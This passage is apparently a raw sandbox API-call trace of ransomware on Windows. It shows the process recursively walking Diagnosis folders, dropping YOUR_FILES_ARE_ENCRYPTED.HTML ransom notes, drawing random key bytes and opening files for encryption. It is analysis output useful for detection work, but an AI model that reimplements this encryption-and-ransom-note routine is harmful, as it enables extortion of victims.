ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae6ba8db, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae6be548, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x318f3a8, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.934] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0109.934] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0109.934] GetProcessHeap () returned 0x600000 [0109.934] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.934] GetProcessHeap () returned 0x600000 [0109.934] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.934] GetProcessHeap () returned 0x600000 [0109.934] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0109.935] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x371b45ea, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x371b45ea, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="ShutdownLogger", cAlternateFileName="SHUTDO~1")) returned 1 [0109.935] StrStrIW (lpFirst="ShutdownLogger", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.935] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger") returned 65 [0109.935] GetProcessHeap () returned 0x600000 [0109.935] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0109.936] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger" [0109.936] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\*" [0109.936] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x371b45ea, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xae6c6cca, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f3a8, dwReserved1=0x19e5b0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0109.936] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x371b45ea, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xae6c6cca, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f3a8, dwReserved1=0x19e5b0, cFileName="..", cAlternateFileName="")) returned 1 [0109.936] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae6c6cca, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae6c6cca, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae6ca7cd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x318f3a8, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.936] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae6c6cca, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae6c6cca, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae6ca7cd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x318f3a8, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.936] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0109.937] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0109.937] GetProcessHeap () returned 0x600000 [0109.937] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.937] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.937] GetProcessHeap () returned 0x600000 [0109.937] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.937] GetProcessHeap () returned 0x600000 [0109.937] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0109.939] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae6cf4e5, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae6cf4e5, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae6d9145, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.939] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae6cf4e5, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae6cf4e5, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae6d9145, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.939] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0109.939] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0109.939] GetProcessHeap () returned 0x600000 [0109.939] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.940] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.940] GetProcessHeap () returned 0x600000 [0109.940] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.940] GetProcessHeap () returned 0x600000 [0109.940] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.940] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdf380d4, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xcdf380d4, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x3509fbde, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x3000000, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="events00.rbs", cAlternateFileName="")) returned 1 [0109.940] StrStrIW (lpFirst="events00.rbs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.940] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\events00.rbs") returned 55 [0109.940] PathFindExtensionW (pszPath="events00.rbs") returned=".rbs" [0109.941] lstrlenW (lpString=".rbs") returned 4 [0109.941] PathFindExtensionW (pszPath="events00.rbs") returned=".rbs" [0109.941] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdf5e2a3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xcdf5e2a3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x3509fbde, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xc28f5c, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="events01.rbs", cAlternateFileName="")) returned 1 [0109.941] StrStrIW (lpFirst="events01.rbs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.941] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\events01.rbs") returned 55 [0109.941] PathFindExtensionW (pszPath="events01.rbs") returned=".rbs" [0109.941] lstrlenW (lpString=".rbs") returned 4 [0109.941] PathFindExtensionW (pszPath="events01.rbs") returned=".rbs" [0109.941] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdf5e2a3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xcdf5e2a3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x3509fbde, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf5c28, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="events10.rbs", cAlternateFileName="")) returned 1 [0109.941] StrStrIW (lpFirst="events10.rbs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.941] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\events10.rbs") returned 55 [0109.941] PathFindExtensionW (pszPath="events10.rbs") returned=".rbs" [0109.941] lstrlenW (lpString=".rbs") returned 4 [0109.941] PathFindExtensionW (pszPath="events10.rbs") returned=".rbs" [0109.941] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdf5e2a3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xcdf5e2a3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x3509fbde, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x2e147a, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="events11.rbs", cAlternateFileName="")) returned 1 [0109.941] StrStrIW (lpFirst="events11.rbs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.941] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\events11.rbs") returned 55 [0109.941] PathFindExtensionW (pszPath="events11.rbs") returned=".rbs" [0109.941] lstrlenW (lpString=".rbs") returned 4 [0109.941] PathFindExtensionW (pszPath="events11.rbs") returned=".rbs" [0109.941] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="LocalTraceStore", cAlternateFileName="LOCALT~1")) returned 1 [0109.941] StrStrIW (lpFirst="LocalTraceStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.941] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore") returned 58 [0109.941] GetProcessHeap () returned 0x600000 [0109.941] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.942] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore" [0109.942] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\*" [0109.942] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae6e67b8, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName=".", cAlternateFileName="")) returned 0x626838 [0109.942] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae6e67b8, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="..", cAlternateFileName="")) returned 1 [0109.942] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae6e67b8, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae6e67b8, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae6eb601, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.942] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae6e67b8, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae6e67b8, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae6eb601, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.943] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0109.943] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 88 [0109.943] GetProcessHeap () returned 0x600000 [0109.943] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.943] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\LocalTraceStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\localtracestore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.943] GetProcessHeap () returned 0x600000 [0109.943] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.943] GetProcessHeap () returned 0x600000 [0109.943] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.944] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd17b1a49, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd17b1a49, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x36edfa80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="parse.dat", cAlternateFileName="")) returned 1 [0109.944] StrStrIW (lpFirst="parse.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.944] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\parse.dat") returned 52 [0109.944] PathFindExtensionW (pszPath="parse.dat") returned=".dat" [0109.944] lstrlenW (lpString=".dat") returned 4 [0109.944] PathFindExtensionW (pszPath="parse.dat") returned=".dat" [0109.944] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0109.944] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\parse.dat" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\parse.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0109.944] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="Sideload", cAlternateFileName="")) returned 1 [0109.944] StrStrIW (lpFirst="Sideload", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.944] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload") returned 51 [0109.944] GetProcessHeap () returned 0x600000 [0109.944] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.945] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload" [0109.945] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\*" [0109.945] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae6f79cb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626638 [0109.946] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae6f79cb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0109.946] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae6f79cb, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae6f79cb, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae6fc865, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.946] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae6f79cb, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae6f79cb, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae6fc865, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.946] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0109.946] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0109.946] GetProcessHeap () returned 0x600000 [0109.946] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.947] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\sideload\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.947] GetProcessHeap () returned 0x600000 [0109.947] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.947] GetProcessHeap () returned 0x600000 [0109.947] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.948] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="Siufloc", cAlternateFileName="")) returned 1 [0109.948] StrStrIW (lpFirst="Siufloc", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.948] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc") returned 50 [0109.948] GetProcessHeap () returned 0x600000 [0109.948] RtlAllocateHeap (HeapHandle=0x600000, 